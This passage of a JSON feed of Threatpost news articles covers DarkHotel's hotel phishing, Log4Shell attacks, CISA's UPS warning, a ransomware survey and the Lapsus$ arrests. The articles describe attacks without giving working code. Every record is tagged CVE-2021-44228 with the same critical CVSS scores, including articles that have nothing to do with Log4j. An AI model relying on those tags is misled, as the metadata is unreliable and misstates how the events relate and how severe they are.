"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-04T16:56:27", "id": "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "href": "https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 MGTO.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. \u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks **\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.'\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade &amp; Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign **\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T04:10:46", "description": "Call it a \u201clogjam\u201d of threats: Attackers including nation-state actors have already targeted half of all corporate global networks in security companies\u2019 telemetry using at least 70 distinct malware families \u2014 and the fallout from the Log4j vulnerability is just beginning.\n\nResearchers manning keyboards all over the world have spent the past several days chasing [attacks aimed at a now-infamous Log4j](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) Java library bug, dubbed [Log4Shell (CVE-2021-44228).](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) Side note: Log4j is pronounced, \u201clog forge\u201d \u2014 although that\u2019s disputed, because it\u2019s also referred to in conversation as \u201clog-four-jay.\u201d Dealer\u2019s choice there.\n\nFirst discovered among Minecraft players last week, the newly discovered vulnerability has opened a massive opportunity for threat actors to hijack servers, mostly with coin miners and botnets, but also a cornucopia of other malware such as the [StealthLoader trojan](<https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/>) \u2014 and that\u2019s just so far.\n\n\u201cWe\u2019ve seen a lot of chatter on Dark Web forums, including sharing scanners, bypasses and exploits,\u201d Erick Galinkin, an artificial intelligence researcher at Rapid7, told Threatpost. \u201cAt this point, more than 70 distinct malware families have been identified by us and other security researchers.\u201d\n\nFor instance, Bitdefender researchers this week [discovered](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>) that threat actors are attempting to exploit Log4Shell to deliver a new ransomware called Khonsari to Windows machines.\n\nCheck Point research reported Wednesday that since last Friday, its team has detected 1.8 million Log4j [exploit attempts](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on almost half of all corporate networks that they track.\n\nThese threat actors aren\u2019t low-skilled hobbyists. Check Point added that as of Wednesday, Iranian hacking group Charming Kitten, also known as APT 35 and widely believed to be working as a [nation-state actor](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>), is actively targeting seven specific Israeli organizations across the government and business sectors.\n\n\u201cOur reports of the last 48 hours prove that both criminal-hacking groups and nation state actors are engaged in the exploration of this vulnerability, and we should all assume more such actors\u2019 operations are to be revealed in the coming days,\u201d Check Point added.\n\nMicrosoft meanwhile reported that nation-state groups Phosphorus (Iran) and [Hafnium](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) (China), as well as unnamed APTs from North Korea and Turkey are actively exploiting Log4Shell (CVE-2021-44228) in targeted attacks. Hafnium is known for targeting Exchange servers with the ProxyLogon zero-days back in March, while Phosphorus [made headlines](<https://threatpost.com/microsoft-iranian-apt-t20-summit-munich-security-conference/160654/>) for targeting global summits and conferences in 2020.\n\n\u201cThis activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment and exploitation against targets to achieve the actor\u2019s objectives,\u201d the company said in [a posting](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>).\n\n## **Is a Log4j Worm Next? **\n\nResearcher Greg Linares meanwhile has reported seeing evidence that a self-propagating worm is being developed and will likely emerge in a day or less.\n\n> [#Log4J](<https://twitter.com/hashtag/Log4J?src=hash&ref_src=twsrc%5Etfw>) based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.\n> \n> Self propagating with the ability to stand up a self hosted server on compromised endpoints.\n> \n> In addition to spraying traffic, dropping files, it will have c2c\n> \n> \u2014 Greg Linares (@Laughing_Mantis) [December 12, 2021](<https://twitter.com/Laughing_Mantis/status/1470165580736987137?ref_src=twsrc%5Etfw>)\n\nThere is wide agreement within the cybersecurity community that he\u2019s correct, but many experts don\u2019t think the fallout will be as bad with Log4j as it was with past incidents like [WannaCry or NotPetya](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\n\u201cWhile it\u2019s possible that we could see a worm developed to spread among susceptible Log4j devices, there hasn\u2019t been any evidence to suggest this is a priority for threat actors at this time,\u201d Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, told Threatpost. \u201cDeveloping malware of this nature takes a significant amount of time and effort.\u201d\n\n\u201cThis activity differs from the WannaCry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue,\u201d Morgan added.\n\n\u201cIt\u2019s still very much early days with regards to Log4j,\u201d Morgan said. \u201cWhile many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm.\u201d\n\nThe emergence of a Log4j worm isn\u2019t the worst-case scenario, researchers like Yaniv Balmas from Salt Security explained to Threatpost.\n\n\u201cWhile not neglecting the impact of such a worm, that might not be the worst scenario because of the unbelievable easiness that this attack can be applied,\u201d Balmas said. \u201cEveryone with a basic computer and internet access could launch an attack against millions of online services within minutes. This achieves quite a similar impact as a worm \u2013 it is distributed and unpredictable, and the damage extent might even be higher than a worm since a worm works \u2018blindly\u2019 in an automated manner.\u201d\n\nHe added, \u201cin this other scenario, there are actual humans behind the attacks which may target specific entities or institutions and enable attackers to fine-tune their attacks as they progress.\u201d\n\nThe tireless work being done by security teams to [patch up Log4j against exploits](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) is a big help against the development of any worms on the horizon, John Bambenek, principal threat hunter at Netenrich, told Threatpost.\n\n\u201cThis vulnerability certainly looks wormable, however, the good news is we\u2019ve already had almost a week to start dealing with detection, mitigation [and patching](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>),\u201dBambenek said. \u201cThere will be lots of vulnerable machines out there, but by now a good deal of the vulnerable machines have been handled and many more are protected with web application firewall (WAF) rules (for instance, Cloudflare deployed protection over the weekend). The worst case would have been a worm last week, we\u2019re in a better place now.\u201d\n\n## **Log4j\u2019s Long Tail **\n\nBeyond emergency patching measures, Galinkin explained to Threatpost that his concern is with lingering unpatched devices and systems that will be vulnerable long after Log4j has fallen out of the headlines, particularly in sectors like academia and healthcare.\n\n\u201cOne crucial thing to note about this vulnerability is that it\u2019s going to have an extremely long tail,\u201d he said. \u201cHospitals tend to purchase software once, but sometimes the vendors become defunct \u2014 leading to unsupported software that will never receive a patch.\u201d\n\nHe added, \u201cin academia, loads of software is written once by grad students or professors, but those individuals may not be aware of the bug, or they simply no longer maintain the software \u2014 software that is in use in physics, pharmacology and bioinformatics. This suggests that we will continue to see exploitation of this vulnerability \u2014 potentially in isolated incidents \u2014 long into the future.\u201d\n\n121621 16:21 UPDATE: Corrected spelling of John Bambenek\u2019s name.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T23:18:44", "type": "threatpost", "title": "Relentless Log4j Attacks Include State Actors, Possible Worm", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T23:18:44", "id": "THREATPOST:5CCE0C2607242B16B2880B331167526C", "href": "https://threatpost.com/log4j-attacks-state-actors-worm/177088/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:33:05", "description": "Cyberattackers are targeting uninterruptible power supply (UPS) devices, which provide battery backup power during power surges and outages. UPS devices are usually used in mission-critical environments, safeguarding critical infrastructure installations and important computer systems and IT equipment, so the stakes are high.\n\nThat\u2019s according to the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy, which warned that malicious types are going after internet-connected versions of UPS via default usernames and passwords, mostly \u2013 though vulnerabilities, like the [TLStorm bugs disclosed earlier this month](<https://threatpost.com/zero-click-flaws-ups-critical-infratructure/178810/>) \u2013 are also in the attacker toolbox.\n\n\u201cIn recent years, UPS vendors have added an Internet of Things [IoT] capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance and/or convenience,\u201d according to a [Tuesday alert](<https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf>) from CISA (PDF). \u201cLoads for UPSs can range from small (e.g., a few servers) to large (e.g., a building) to massive (e.g., a data center).\u201d\n\nIf attackers are able to remotely take over the devices, they can be used for a host of nefarious ends. For instance, bad actors can use them as a jumping-off point to breach a company\u2019s internal network and steal data. Or, in a grimmer scenario, they could be used to cut power for mission-critical appliances, equipment or services, which could cause physical injury in an industrial environment, or disrupt business services, leading to significant financial losses.\n\nFurther, cyberattackers could also execute remote code to alter the operation of the UPSs themselves, or physically damage them (or the devices connected to them).\n\n\u201cIt\u2019s easy to forget that every device connected to the internet is at increased risk of attack,\u201d Tim Erlin, vice president of strategy at Tripwire, noted via email. \u201cJust because a vendor provides the capability to put a device on the internet, doesn\u2019t mean that it\u2019s set up to be secure. It\u2019s up to each organization to ensure that the systems they deploy are configured securely.\u201d\n\n## **An Easy Fix**\n\nThus, those responsible for UPS upkeep (which CISA noted could include IT staff, building operations people, industrial maintenance workers or third-party contractors from monitoring services) have an easy fix for this one: Enumerating all connected UPSs and similar systems and simply take them offline.\n\nIf maintaining an active IoT connection is a requirement, admins should change the default credentials to a strong user-name-and-password combo \u2013 and preferably, implement multifactor authentication (MFA) too, CISA added. And other mitigations, according to CISA, include ensuring UPSs are behind a virtual private network (VPN), and adopting login timeout/lockout features so that the devices aren\u2019t continually online and open to the world.\n\n\u201cThe use of a default username and password to maliciously access a system isn\u2019t a new technique,\u201d said Erlin. \u201cIf you\u2019re responding to this advisory by updating the credentials for your UPS systems, take the follow-up step to ensure that other systems aren\u2019t using default credentials as well.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T17:14:57", "type": "threatpost", "title": "Cyberattackers Target UPS Back-Up Power Devices in Mission-Critical Environments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T17:14:57", "id": "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "href": "https://threatpost.com/cyberattackers-ups-backup-power-critical-environments/179169/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T21:25:13", "description": "City of London Police have arrested seven people suspected of being connected to the Lapsus$ gang.\n\nThe bust came within hours of Bloomberg having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind.\n\nThe police haven\u2019t verified whether or not they nabbed the Oxford teen, per se.\n\nAt any rate, given that he\u2019s a minor, it would be illegal to identify him: According to security journalist [Brian Krebs](<https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/>), the teen is 17, though the [BBC](<https://www.bbc.com/news/technology-60864283>) pegs his age at 16.\n\nBut for what it\u2019s worth, all of the suspects are young. In a statement given to [TechCrunch](<https://techcrunch.com/2022/03/24/london-police-lapsus-arrests/>), the City of London Police said the seven are between 16 and 21: \u201cThe City of London Police has been conducting an investigation with its partners into members of a hacking group,\u201d according to Detective Inspector Michael O\u2019Sullivan. \u201cSeven people between the ages of 16 and 21 have been arrested in connection with this investigation and have all been released under investigation. Our enquiries remain ongoing.\u201d\n\nInvestigators reportedly told Bloomberg that another member of Lapsus$ is suspected to be a teenager residing in Brazil. There could well be more: Another investigator told the outlet that security researchers have identified seven unique accounts associated with Lapsus$, \u201cindicating that there are likely others involved in the group\u2019s operations.\u201d\n\n## Busy Beavers\n\nOver the past few months, Lapsus$ \u2013 a data extortion group \u2013 has targeted [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>) and the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [crippled](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) the Portuguese media kingpin Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nAllison Nixon**,** chief research officer at [Unit 221B](<https://www.unit221b.com/>), is one of the researchers who\u2019ve been tracking the Oxford teen, who, researchers say, goes by the online aliases \u201cWhite,\u201d \u201cBreachbase\u201d or \u201cOklaqq,\u201d among other names\n\nShe\u2019s been working with researchers at security firm Palo Alto Networks to track individual members of LAPSUS$ even prior to the group\u2019s formation. Nixon told KrebsOnSecurity that she\u2019s convinced that the White/OklAGG individual is the head honcho, given that, among other things, theidentity has been tied to the Lapsus$ group\u2019s recruiting message for company insiders to help them penetrate targeted organizations.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png>)\n\nThe Lapsus$ gang\u2019s recruitment ad for rogue employees.\n\nNixon told the BBC that researchers have had the Oxford teen\u2019s name since the middle of last year and that they\u2019d identified him even before he was doxed by a hacking forum \u2013 Doxbin, a site where people can post or sift through the personal data of hundreds of thousands of people for the purpose of doxing \u2013that he\u2019d allegedly purchased and then run as a lousy, much-complained-about admin.\n\nHe wound up selling the forum back to its previous owner, at a loss, then leaked the entire Doxbin dataset, leading to the Doxbin community turning around and doxing him right back. That included what Krebs reported as \u201cvideos supposedly shot at night outside his home in the United Kingdom,\u201d along with his name, address, and social media pictures.\n\nThe Doxbin community also posted a curriculum vitae of his hacking career, the BBC reported \u2013 a career that made him filthy rich in short order. His Doxbin entry connected him to Lapsus$, as well. The entry reportedly reads:\n\n> \u201c[He] slowly began making money to further expand his exploit collection. \u2026 After a few years his net worth accumulated to well over 300BTC (close to $14 mil). \u2026 [He] now is affiliated with a wannabe ransomware group known as \u2018Lapsus$\u2019, who has been extorting &amp; \u2018hacking\u2019 several organisations.\u201d \u2014Doxbin entry, per the BBC\n\nNixon told the BBC that Unit 221B, working with Palo Alto, identified the threat actor and then watched his exploits throughout 2021, \u201cperiodically sending law enforcement a heads-up about the latest crimes.\u201d\n\nShe said that researchers tracked him by \u201cwatching the post history of an account and seeing older posts provide contact information for the guy.\u201d The \u201cWhite\u201d individual also helped, she said, by failing to cover his tracks.\n\n## Get Off My Code, You Damn Kids\n\nAfter its breaches, Lapsus$ has posted stolen source code on the group\u2019s Telegram channel, including code stolen from Microsoft\u2019s Azure DevOps server for the company\u2019s Bing and Cortana products. Lapsus$ has also posted screenshots of Okta\u2019s Slack channels and the interface for Cloudflare, which is one of thousands of customers that use Okta\u2019s technology to provide authentication for its employees.\n\nIn February, the group also [stole](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>) two of Nvidia\u2019s code-signing certificates \u2013 certificates that were then used to sign malware, enabling malicious programs to slide past security safeguards on Windows machines.\n\nAfter its headline-grabbing attacks on Microsoft and Okta this past weekend, Lapsus$ announced on Tuesday that it was going to take a bit of a breather.\n\n\u201cA few of our members has a vacation until 30/3/2022. We might be quiet for some times,\u201d the hackers wrote in the group\u2019s Telegram channel. \u201cThanks for understand us. \u2013 we will try to leak stuff ASAP.\u201d\n\n## Why\u2019d You Do It?\n\nKen Westin, director of security strategy at Cybereason, said it\u2019s tough to guess at the motivation of the purported \u201cmastermind\u201d teen. \u201cMany had speculated it was an organized cybercrime syndicate or potential nation state actors,\u201d he told Threatpost in an email on Thursday.\n\nWhatever the teen\u2019s motivation \u2013 he\u2019s described as having autism, for whatever that\u2019s worth \u2013 Westin thinks the security community underestimates the younger generation. \u201cWe forget teens today have not only grown up with computers, but also have access to an unprecedented number of 